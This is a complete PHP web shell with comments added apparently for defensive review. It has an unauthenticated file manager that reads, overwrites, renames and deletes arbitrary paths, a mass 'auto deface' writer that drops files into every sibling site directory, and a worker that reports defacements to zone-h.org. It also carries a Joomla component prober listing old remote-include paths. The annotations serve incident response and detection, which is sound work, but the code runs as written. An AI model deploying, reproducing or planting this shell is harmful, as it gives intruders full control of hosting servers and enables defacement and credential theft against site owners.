- <?php
// Review note (defensive analysis): this listing is a PHP web shell with a file manager,
// a bulk file-writing feature, a zone-h submission feature and a Joomla component prober.
// Every feature is selected purely by request parameters. No login, session or
// source-address check appears anywhere in the listing, so anyone who can reach the URL
// can drive it with the privileges of the PHP process.
// The parameter names read below are stable indicators for access-log and WAF rules.
// PHP_SELF is taken from the request path and is later echoed unescaped into the menu links.
- $self = $_SERVER['PHP_SELF'];
// dir: directory to list. nampak: file to display in the editor and to overwrite on save.
- $dir = $_GET["dir"];
- $nampak = $_GET["nampak"];
// edit: replacement content written to the nampak path.
- $edit = $_POST["edit"];
// rename: source path of a rename. namakan: destination path of that rename.
- $rename = $_GET["rename"];
- $namakan = $_POST["namakan"];
// padam: path passed to unlink(); a single GET request is enough to delete a file.
- $padam = $_GET["padam"];
// ok, bugi, buatdir, jumlabah: any non-null value shows the auto-deface form, the zone-h
// form, the make-directory form and the Joomla scanner form respectively.
- $autodeface = $_GET["ok"];
- $zonhi = $_GET["bugi"];
- $dapatdir = $_GET["buatdir"];
- $jumlabah = $_GET["jumlabah"];
// newfile / editnew: path and content of a file to create. cretnew: shows the create form.
- $newfile = $_POST["newfile"];
- $editnew = $_POST["editnew"];
- $cretnew = $_GET["cretnew"];
// zonmas(): prints the HTML form of the zone-h submission feature and does nothing else.
// The form posts four fields back to this same script (empty action): defacer (free text),
// hackmode (numeric code 1-30), reason (numeric code 1-7) and domain (one site per line).
// The top-level code that reads those POST fields performs the actual outbound requests.
// For responders: the literal option labels and the field names defacer / hackmode / reason /
// domain are usable as content signatures when scanning a web root for this file.
- function zonmas()
- {
- echo '<center>
- <form action="" method="post">
- <div id="option">
- <font class="res"><p>Defacer<br />
- <span class="ok"><input type="text" name="defacer" class="ibtn" /></span> </p>
- <p>How to hack <br /><select class="ibtn" name="hackmode">
- <option >--------SELECT--------</option>
- <option value="1">known vulnerability (i.e. unpatched system)</option>
- <option
- value="2" >undisclosed (new) vulnerability</option>
- <option
- value="3" >configuration / admin. mistake</option>
- <option
- value="4" >brute force attack</option>
- <option
- value="5" >social engineering</option>
- <option
- value="6" >Web Server intrusion</option>
- <option
- value="7" >Web Server external module intrusion</option>
- <option
- value="8" >Mail Server intrusion</option>
- <option
- value="9" >FTP Server intrusion</option>
- <option
- value="10" >SSH Server intrusion</option>
- <option
- value="11" >Telnet Server intrusion</option>
- <option
- value="12" >RPC Server intrusion</option>
- <option
- value="13" >Shares misconfiguration</option>
- <option
- value="14" >Other Server intrusion</option>
- <option
- value="15" >SQL Injection</option>
- <option
- value="16" >URL Poisoning</option>
- <option
- value="17" >File Inclusion</option>
- <option
- value="18" >Other Web Application bug</option>
- <option
- value="19" >Remote administrative panel access through bruteforcing</option>
- <option
- value="20" >Remote administrative panel access through password guessing</option>
- <option
- value="21" >Remote administrative panel access through social engineering</option>
- <option
- value="22" >Attack against the administrator/user (password stealing/sniffing)</option>
- <option
- value="23" >Access credentials through Man In the Middle attack</option>
- <option
- value="24" >Remote service password guessing</option>
- <option
- value="25" >Remote service password bruteforce</option>
- <option
- value="26" >Rerouting after attacking the Firewall</option>
- <option
- value="27" >Rerouting after attacking the Router</option>
- <option
- value="28" >DNS attack through social engineering</option>
- <option
- value="29" >DNS attack through cache poisoning</option>
- <option
- value="30" >Not available</option>
- </select></p>
- <p> Cause of hack ? <br /><select class="ibtn" name="reason">
- <option >--------SELECT--------</option>
- <option
- value="1" >Heh...just for fun!</option>
- <option
- value="2" >Revenge against that website</option>
- <option
- value="3" >Political reasons</option>
- <option
- value="4" >As a challenge</option>
- <option
- value="5" >I just want to be the best defacer</option>
- <option
- value="6" >Patriotism</option>
- <option
- value="7" >Not available</option>
- </select> </p>
- <p>Sites <br />
- <span class="fur">Put all the sites on the server</span><br />
- <span class=""><textarea name="domain" class="conten"></textarea></span> </p>
- <p><button type="submit" value="Send" class="vutun"/>SEND</button>
- </font></form>
- <br>
- </div>
- </center>';
- }
// Banner, printed on every request regardless of parameters. It discloses host details to
// whoever loads the page: php_uname() concatenated with PHP_OS, and the total and free
// byte counts of the root filesystem from disk_total_space / disk_free_space.
// It then renders the feature menu; the links select features with the query strings
// ok=haha, bugi=haha and jumlabah=haha appended to the unescaped PHP_SELF value.
// The banner image is fetched from a third-party host, so each visit to the shell also
// produces a browser request to that host.
// For responders: the class names adiv / atas / autodefacebtn together with the menu
// labels are usable as file-content and response-body signatures.
- echo '<div class="adiv"><center><img src="http://blog.flamingtext.com/blog/2013/07/14/flamingtext_com_1373813801_580797130.gif"></center><br /><div class="atas"><font class="os">Operating System:<font class="res">'.php_uname().PHP_OS.'</font><br />
- Total HDD:<font class="res">'.disk_total_space("/").' bytes</font><br />
- Total Freespace:<font class="res">'.disk_free_space("/").' bytes</font>
- </font>
- </div>
- <div class="tool"><a class="autodefacebtn" href="'.$self.'?ok=haha">Auto Deface Tool</a><a class="autodefacebtn" href="'.$self.'?">Filemanager</a><a class="autodefacebtn" href="'.$self.'?bugi=haha">zone-h</a><a class="autodefacebtn" href="'.$self.'?jumlabah=haha">Joomla COM scanner</a>
- </div>
- ';
- // AUTO-DEFACE TOOL: input form
// autodeface(): prints the form of the bulk file-writing feature and does nothing else.
// Fields posted back to this script: nameauto (file name, pre-filled with bugima.php),
// pathauto (parent folder, pre-filled with getcwd() plus a slash) and contentauto (file
// body, pre-filled with the text shown in the textarea).
// For responders: the pre-filled file name and body are defaults taken from this listing;
// if the operator did not change them they identify files dropped by this tool.
- function autodeface()
- {
- echo '<br />
- <font class="up">AUTO DEFACE TOOL</font>
- <br /><font class="os"><form action="" method="post">
- file name :<br />
- <input class="ibtn" name="nameauto" value="bugima.php" width="70%"><br />
- folder path:<br />
- <input class="ibtn" name="pathauto" width="70%" value="'.getcwd().'/"><br />
- content:<br /><textarea class="conten" name="contentauto" cols="30" rows="30">hacked by bugima</textarea><br />
- <button class="vutun" type="submit">Deface</button>
- </form></font>';
- }
- // zone-h tool: submission worker
// Runs at top level on every request. When the POST field domain is non-null, the server
// itself sends one HTTP POST per submitted line to the notify URL below.
// For responders: outbound HTTP from a web server to this host is an egress-monitoring
// indicator; the response is stored in $tetek and never read, so nothing is shown or
// logged locally by the script.
- $hacker = $_POST['defacer'];
- $method = $_POST['hackmode'];
- $reson = $_POST['reason'];
- $site = $_POST['domain'];
- if($site != null)
// Split the textarea on runs of LF or CRLF so each line is treated as one site.
- { $allsite = preg_split('/(\r?\n)+/', $site);
- foreach($allsite as $sites)
- {
- $k = curl_init("http://zone-h.org/notify/single");
- curl_setopt($k,CURLOPT_POST,true);
// The four posted values are concatenated into the request body exactly as received.
- curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $sites."&hackmode=".$method."&reason=".$reson);
- curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
- $tetek = curl_exec($k);
- curl_close($k);
- }
- }
- else
- {
- }
- // list a directory and its files
// kasilist(): directory browser for the path given in the GET parameter dir.
// The path is passed straight to scandir() with no base-directory restriction, so any
// directory readable by the PHP process can be enumerated.
// Entry names and paths are echoed into the page without HTML escaping.
// Each entry gets links that carry the full path in the query string: dir (descend),
// nampak (open in editor), rename and padam (delete). These path-bearing query strings
// are what shows up in access logs when the file manager is used.
- function kasilist()
- {
- $dir = $_GET["dir"];
- $fol = scandir($dir);
- foreach($fol as $fo)
- {
// The two dot entries are rendered as navigation controls rather than as files.
- if($fo === ".")
- {
- $dirname = dirname($dir);
- echo "<div class='line'><a class='up' href='".$self."?dir=".$dirname."'><<</a>";
- }
- elseif($fo === "..")
- {
- $dirname = dirname($dir);
- echo "<a class='up' href='".$self."?dir=".$dirname."'>UP</a><a href='".$self."?buatdir=".$dir."' class='buatdir'>Make dir</a><a href='".$self."?cretnew=".$dir."/newfile.php' class='buatdir'>Make File</a></div>";
- }
- else
- {
// Despite its name, $isdir holds the is_file() result: false selects the directory row.
- $isdir = is_file($dir."/".$fo);
- if($isdir === false)
- {
- echo "<div class='line'><a class='dir' href='".$self."?dir=".$dir."/".$fo."'>".$fo."</a><a class='rename' href='".$self."?rename=".$dir."/".$fo."'> Rename</a>
- <a class='rename' href='".$self."?padam=".$dir."/".$fo."'> Delete</a><font class='filesize'>".filesize($dir."/".$fo)." bytes</font>
- </div>";
- }
- else
- {
- echo "<div class='line'><a class='link' href='".$self."?nampak=".$dir."/".$fo."'>".$fo."</a><a class='rename' href='".$self."?rename=".$dir."/".$fo."'> Rename</a>
- <a class='rename' href='".$self."?padam=".$dir."/".$fo."'> Delete</a><font class='filesize'>".filesize($dir."/".$fo)." bytes</font>
- </div>";
- }
- }
- }
- }
// kaslist(): default view of the file manager. Lists the current working directory of the
// script via scandir(getcwd()); the request router calls it when no dir parameter is
// present. It emits the same kinds of links as kasilist(): dir, nampak, rename, padam,
// plus buatdir and cretnew on the navigation row.
// For responders: a plain request to the script with no parameters already reveals the
// contents of the directory the shell was dropped in.
- function kaslist()
- {
- $fol2 = scandir(getcwd());
- foreach($fol2 as $fo2)
- {
- if($fo2 === ".")
- {
- $dirname = dirname(getcwd().$fo2);
- echo "<div class='line'><a class='up' href='".$self."?dir=".$dirname."'><<".$fo."</a>";
- }
- elseif($fo2 === "..")
- {
- $dirname = dirname(getcwd().$fo2);
- echo "<a class='up' href='".$self."?dir=".$dirname."'>UP".$fo."</a><a href='".$self."?buatdir=".getcwd()."' class='buatdir'>Make dir</a><a href='".$self."?cretnew=".getcwd()."/newfile.php' class='buatdir'>Make File</a></div>";
- }
- else
- {
// is_dir() is given the bare entry name, so it is resolved against the working directory.
- $isdir2 = is_dir($fo2);
- if($isdir2 === true)
- {
- $root = getcwd();
- echo "<div class='line'><a class='dir' href='".$self."?dir=".$root."/".$fo2."'>".$fo2."</a>
- <a class='rename' href='".$self."?rename=".$root."/".$fo2."'> Rename</a>
- <a class='rename' href='".$self."?padam=".$root."/".$fo2."'> Delete</a>
- <font class='filesize'>".filesize($root."/".$fo2)." bytes</font>
- </div>";
- }
- else
- {
- echo "<div class='line'><a class='link' href='".$self."?nampak=".$root."/".$fo2."'>".$fo2."</a><a class='rename' href='".$self."?rename=".$root."/".$fo2."'> Rename</a>
- <a class='rename' href='".$self."?padam=".$root."/".$fo2."'> Delete</a>
- <font class='filesize'>".filesize($root."/".$fo2)." bytes</font>
- </div>";
- }
- }
- }
- }
// untukopen(): file viewer / editor form. Reads the file named by the GET parameter
// nampak with file_get_contents() and echoes its bytes, unescaped, into a textarea named
// edit. There is no path restriction, so this is an arbitrary file read for anything the
// PHP process can open (configuration files and credentials included).
// For responders: requests carrying nampak= with an absolute path show which files were
// viewed; treat secrets in any file listed that way as exposed.
- function untukopen()
- {
- $nampak = $_GET["nampak"];
- $content = file_get_contents($nampak);
- echo "<font class='up'>EDIT FILE<br /></font><form action='' method='post'>
- <textarea class='conten' name='edit'>".$content."</textarea><br />
- <button type='submit' class='vutun'>Save</button>
- </form><br />";
- $back = dirname($nampak);
- echo "<a class='up' href='".$self."?dir=".$back."'><<</a>";
- }
- // create a file: input form
// untukbuatfile(): prints the create-file form and does nothing else. The form posts
// editnew (file body) and newfile (target path) back to this script; the target path is
// pre-filled with the raw GET parameter cretnew, echoed without escaping.
// The write itself is done by the top-level code that reads newfile and editnew.
- function untukbuatfile()
- {
- echo "<font class='up'>CREATE FILE<br /></font><form action='' method='post'>
- <font class='os'>Content:<br /><textarea class='conten' name='editnew'>".$content."</textarea><br />
- File name:<br /><input name='newfile' class='ibtn' value='".$_GET["cretnew"]."'><br /></font>
- <button type='submit' class='vutun'>Save</button>
- </form><br />";
- $back = dirname($nampak);
- echo "<a class='up' href='".$self."?dir=".$back."'><<</a>";
- }
- // request router: choose which view to render
// Exactly one view is rendered per request, chosen by the first non-null parameter in this
// order: rename (rename form), nampak (editor), ok (auto-deface form), bugi (zone-h form),
// buatdir (make-directory form), jumlabah (scanner form), cretnew (create-file form),
// then dir (listing of that directory) and finally the working-directory listing.
// The comparisons use loose != null, so an empty string also counts as absent.
// No branch performs any authentication or authorization check.
- if($rename != null)
- {
// The raw rename parameter is echoed unescaped into the value attribute of the input.
- echo '<font class="up">RENAME FILE<br /></font><form action="" method="post">
- <input name="namakan" value="'.$rename.'" class="ibtn">
- <br /><button type="submit" class="rbtn">rename</button>
- </form>';
- }
- else
- {
- if($nampak != null)
- {
- untukopen();
- }
- elseif($autodeface != null)
- {
- autodeface();
- }
- elseif($zonhi != null)
- {
- zonmas();
- }
- elseif($dapatdir != null)
- {
- buatdir();
- }
- elseif($jumlabah != null)
- {
- jomlascn();
- }
- elseif($cretnew != null)
- {
- untukbuatfile();
- }
- else
- {
- If($dir != null)
- {
- $dir = $_GET["dir"];
- kasilist();
- }
- else
- {
- $dir = $_GET["dir"];
- kaslist();
- }
- }
- }
- // (hide) marker left by the author; no code follows it
// The four handlers below run at top level on every request, after the view has been
// rendered. Each acts on attacker-supplied paths with no restriction, limited only by the
// filesystem permissions of the PHP process, and none of the return values is checked, so
// the success text is printed whether or not the operation worked.
// For responders: file-integrity monitoring and web-root write restrictions are the
// controls that bound this; the success strings are usable as response-body signatures.
- // edit a file
// Overwrite: the path comes from GET nampak, the new content from POST edit.
- if($edit != null)
- {
- $file = fopen($nampak,"w");
- fwrite($file,$edit);
- fclose($file);
- echo "<br /><font class='result'>File Saved</font>";
- }
- else
- {
- }
- // create a file
// Create or truncate: the path comes from POST newfile, the content from POST editnew.
- if($newfile != null)
- {
- $filenew = fopen($newfile,"w");
- fwrite($filenew,$editnew);
- fclose($filenew);
- echo "<br /><font class='result'>File Saved</font>";
- }
- else
- {
- }
- // rename a file
// Rename or move: the source comes from GET rename, the destination from POST namakan.
- if($namakan != null)
- {
- rename($rename,$namakan);
- echo "<font class='result'>Renamed</font>";
- }
- else
- {
- }
- // delete a file
// Delete: the path comes from GET padam, so a single crafted link is enough to trigger it.
- if($padam != null)
- {
- unlink($padam);
- echo "<font class='result'>deleted</font>";
- }
- else
- {
- }
- // AUTO-DEFACE TOOL: worker
// Bulk writer behind the auto-deface form. For every immediate subdirectory of the posted
// pathauto folder it creates or truncates a file named nameauto and fills it with
// contentauto.
// For responders: the footprint is many files with one name and identical content
// appearing in sibling directories within a single request. File-integrity monitoring or
// a search of the parent folder for that shared name and hash finds every affected site.
- $defA = $_POST["nameauto"];
- $conA = $_POST["contentauto"];
- $dirA = $_POST["pathauto"];
// scandir() is called on every request, including those that did not post pathauto.
- $folA = scandir($dirA);
- if($defA != null)
- {
- foreach($folA as $foA)
- {
// pathauto is concatenated directly with the entry name, so it must end with a separator
// for the test to match (the form pre-fills it that way).
- if(is_dir($dirA.$foA) === true)
- {
- $fileA = fopen($dirA.$foA.'/'.$defA,"w");
- fwrite($fileA,$conA);
- fclose($fileA);
// The directory name is printed as if it were a host name -- presumably this assumes a
// hosting layout with one folder per domain; confirm against the affected server.
- echo '<a class="dir" href="http://'.$foA.'/'.$defA.'">'.$foA.'</a><font class="res">:::defaced</font><br />';
- }
- else
- {
- }
- }
- }
- else
- {
- }
- // make directory: input form
// buatdir(): prints the make-directory form and does nothing else. The single field mdir
// is pre-filled with the raw GET parameter buatdir (echoed without escaping) followed by
// /newdir, and is posted back to this script.
- function buatdir()
- {
- echo '<form action="" method="post"><font class="os">Dir Name:<br /></font><input name="mdir" class="ibtn" value="'.$_GET["buatdir"].'/newdir"><br />
- <button type="submit" class="rbtn">Make Directory</button></form>';
- }
// Make-directory worker: runs at top level whenever POST mdir is non-null and creates
// that path with mode 0700 (owner-only, subject to umask). The return value of mkdir() is
// not checked, so the success text is printed either way.
// For responders: directories owned by the web-server account with owner-only permissions
// inside a web root are worth reviewing after an incident involving this file.
- $mdir = $_POST["mdir"];
- if($mdir != null)
- {
- mkdir($mdir, 0700);
- echo "<font class='res'>dir created</font>";
- }
- else
- {
- }
- // JOOMLA COMPONENT scanner: input form
// jomlascn(): prints the scanner form and does nothing else. The single field urljom
// (pre-filled with a placeholder URL) is posted back to this script, where the top-level
// scanner code uses it as the base URL for its requests.
- function jomlascn()
- {
- echo '<form action="" method="post">
- <font class="os">Url:</font><br /><input name="urljom" class="ibtn" value="http://example.com">
- <button type="submit" class="rbtn">SCAN</button>
- </form>';
- }
// Joomla component prober: runs at top level whenever POST urljom is non-null. The
// compromised server itself issues one GET per path in the list below, each appended to
// the posted base URL, so the scan traffic originates from the victim host.
// For responders on the hosting side: a burst of outbound requests to one external site
// from the web-server account is the indicator, and egress filtering limits it. The base
// URL is not validated, so the same code fetches whatever URL prefix it is given.
// For responders on the receiving side: the pattern is a rapid sequence of index.php
// requests that differ only in the option= value, followed by component paths whose
// query string ends in a path-style parameter such as mosConfig_absolute_path= with no
// value. NOTE(review): those parameter names look like include-path overrides from old
// Mambo/Joomla components; requests carrying them are worth alerting on -- confirm
// against the components actually installed.
- $urljom = $_POST["urljom"];
- if($urljom != null)
- {
- $comx = "/index.php?option=com_collector
- /index.php?option=com_jemessenger
- /index.php?option=com_ksadvertiser
- /index.php?option=com_jce
- /index.php?option=com_svmap
- /index.php?option=com_NeoRecruit
- /index.php?option=com_facebook
- /index.php?option=com_jdownloads
- /index.php?option=com_movm
- /index.php?option=com_restaurante
- /index.php?option=com_frontpage
- /index.php?option=com_ignitegallery
- /index.php?option=com _if_surfalert
- /index.php?option=com_newsfeeds
- /index.php?option=com_fss
- /index.php?option=com_jobprofile
- /index.php?option=com_wrapper
- /index.php?option=com_jphoto
- /index.php?option=com_acymailing
- /index.php?option=spidercatalog
- /index.php?option=com_joomla_flash_uploader
- /index.php?option=com_myalbum
- /index.php?option=com_ponygallery
- /index.php?option=com_tag
- /index.php?option=com_rsfiles
- /index.php?option=com_qcontacts
- /index.php?option=com_races
- /index.php?option=com_bch
- /index.php?option=com_idoblog
- /index.php?option=com_user
- /index.php?option=com_beeheard
- /index.php?option=com_rsform
- /index.php?option=com_xsstream-dm
- /index.php?option=com_virtuemart
- /index.php?option=com_fireboard
- /index.php?option=com_clasifier
- /index.php?option=com_joomloads
- /index.php?option=com_na_content
- /index.php?option=com_pms
- /index.php?option=com_media_library
- /index.php?option=com_simpleshop
- /index.php?option=com_gmaps
- /index.php?option=com_rpx
- /index.php?option=com_album
- /index.php?option=com_books
- /index.php?option=com_product
- /index.php?option=com_pccookbook
- /index.php?option=com_fabrik
- /index.php?option=com_phocagallery
- /index.php?option=com_kunena
- /index.php?option=com_content
- /index.php?option=com_facileforms
- /index.php?option=com_cpg
- /index.php?option=com_smf
- /index.php?option=com_rsgallery
- /index.php?option=com_mtree
- /index.php?option=com_galleria
- /index.php?option=com_mgm
- /index.php?option=com_webring
- /index.php?option=com_a6mambocredits
- /index.php?option=com_uhp
- /index.php?option=com_cropimage
- /index.php?option=com_linkdirectory
- /index.php?option=com_comprofiler
- /index.php?option=com_phpshop
- /index.php?option=com_artlinks
- /index.php?option=com_remository
- /index.php?option=com_performs
- /index.php?option=com_extended_registration
- /index.php?option=com_zoom
- /index.php?option=com_serverstat
- /index.php?option=com_simpleboard
- /index.php?option=com_extcalendar
- /components/com_facileforms/facileforms.frame.php?ff_compath=
- /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
- /components/com_zoom/includes/database.php?mosConfig_absolute_path=
- /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
- /components/com_performs/performs.php?mosConfig_absolute_path=
- /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
- /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
- /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
- /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
- /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
- /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
- /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
- /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
- /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
- /administrator/components/com_webring/admin.webring.docs.php?component_dir=
- /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
- /components/com_galleria/galleria.html.php?mosConfig_absolute_path=
- /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=
- /components/com_performs/performs.php?mosConfig_absolute_path=
- /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=
- /components/com_smf/smf.php?mosConfig_absolute_path=
- /components/com_cpg/cpg.php?mosConfig_absolute_path=
- /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
- /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
- /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
- /components/com_simpleboard
- /components/com_extcalendar";
// The list is split on runs of LF or CRLF into one path per element.
- $arrayjom = preg_split('/(\r?\n)+/', $comx);
- foreach($arrayjom as $allcom)
- {
- $tazjom = curl_init($urljom.$allcom);
- curl_setopt($tazjom, CURLOPT_RETURNTRANSFER, true);
- $tobjom = curl_exec($tazjom);
- curl_close($tazjom);
// A failed transfer is silently skipped.
- if($tobjom === false)
- {
- }
- else
- {
// Presence is judged from the response body only, not the HTTP status: a path is reported
// when none of the three marker strings occurs anywhere in the body (case-insensitive).
- $ti = strripos($tobjom, "404");
- $ta = strripos($tobjom, "not exist");
- $te = strripos($tobjom, "ponent not found");
- if($ti === false & $ta === false & $te === false)
- {
- echo "<font class='os'>its have:<font class='res'>".$allcom."</font> component</font><br />";
- }
- else
- {
- }
- }
- }
- }
- else
- {
- }
- ?>
- <style>
- body
- {
- background-color:black;
- }
- .line
- {
- border:2px green outset;
- width:100%;
- }
- .linerext
- {
- text-shadow: 0 0 20px green;
- font-color:green;
- }
- .conten
- {
- border:2px green outset;
- width:70%;
- height:400px;
- }
- .vutun
- {
- border:2px red outset;
- width:70%;
- color:white;
- background-color:red;
- }
- .link
- {
- text-shadow: 0 0 20px green;
- color:white;
- text-decoration:none;
- color:green;
- }
- .rename
- {
- float:right;
- text-shadow: 0 0 20px white;
- color:white;
- text-decoration:none;
- background-color:red;
- }
- .dir
- {
- text-shadow: 0 0 20px white;
- color:white;
- text-decoration:none;
- background-color:grey;
- }
- .ibtn
- {
- border:2px red outset;
- width:60%;
- color:red;
- background-color:black;
- }
- .rbtn
- {
- border:2px red outset;
- width:60%;
- color:white;
- background-color:red;
- }
- .up
- {
- text-shadow: 0 0 20px red;
- color:red;
- font-size:30px;
- text-decoration:none;
- }
- .result
- {
- text-shadow: 0 0 20px white;
- color:white;
- font-size:20px;
- text-decoration:none;
- }
- .os
- {
- text-shadow: 0 0 20px white;
- color:white;
- font-size:20px;
- text-decoration:none;
- }
- .atas
- {
- border:3px grey #333333;
- background-color:#333333;
- width:100%;
- }
- .res
- {
- text-shadow: 0 0 20px red;
- color:red;
- font-size:20px;
- text-decoration:none;
- }
- .tool
- {
- border:3px outset #005533;
- background-color:#005533;
- width:100%;
- }
- .tol
- {
- text-shadow: 0 0 20px white;
- color:white;
- text-decoration:none;
- background-color:red;
- width:20px;
- }
- .autodefacebtn {
- -moz-box-shadow:inset 2px 15px 0px 0px #f29c93;
- -webkit-box-shadow:inset 2px 15px 0px 0px #f29c93;
- box-shadow:inset 2px 15px 0px 0px #f29c93;
- background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #fe1a00), color-stop(1, #ce0100) );
- background:-moz-linear-gradient( center top, #fe1a00 5%, #ce0100 100% );
- filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fe1a00', endColorstr='#ce0100');
- background-color:#fe1a00;
- -moz-border-radius:3px;
- -webkit-border-radius:3px;
- border-radius:3px;
- border:1px solid #d83526;
- display:inline-block;
- color:#ffffff;
- font-family:arial;
- font-size:15px;
- font-weight:bold;
- padding:6px 24px;
- text-decoration:none;
- text-shadow:1px 1px 0px #b23e35;
- }.autodefacebtn:hover {
- background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #ce0100), color-stop(1, #fe1a00) );
- background:-moz-linear-gradient( center top, #ce0100 5%, #fe1a00 100% );
- filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ce0100', endColorstr='#fe1a00');
- background-color:#ce0100;
- }.autodefacebtn:active {
- position:relative;
- top:1px;
- }
- .buatdir
- {
- float:right;
- text-shadow: 0 0 20px white;
- color:white;
- text-decoration:none;
- background-color:red;
- }
- .filesize
- {
- float:right;
- text-shadow: 0 0 20px white;
- color:white;
- text-decoration:none;
- }
- .adiv
- {
- border:3px grey outset;
- width:100%;
- }
- </style>
- </div>
- <object width="0" height="0"><param name="movie" value="http://www.youtube.com/v/8o1q8VXmiE8?version=3&hl=en_US&autoplay=1&loop=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/8o1q8VXmiE8?version=3&hl=en_US&autoplay=1&loop=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="1" height="0"></embed></object>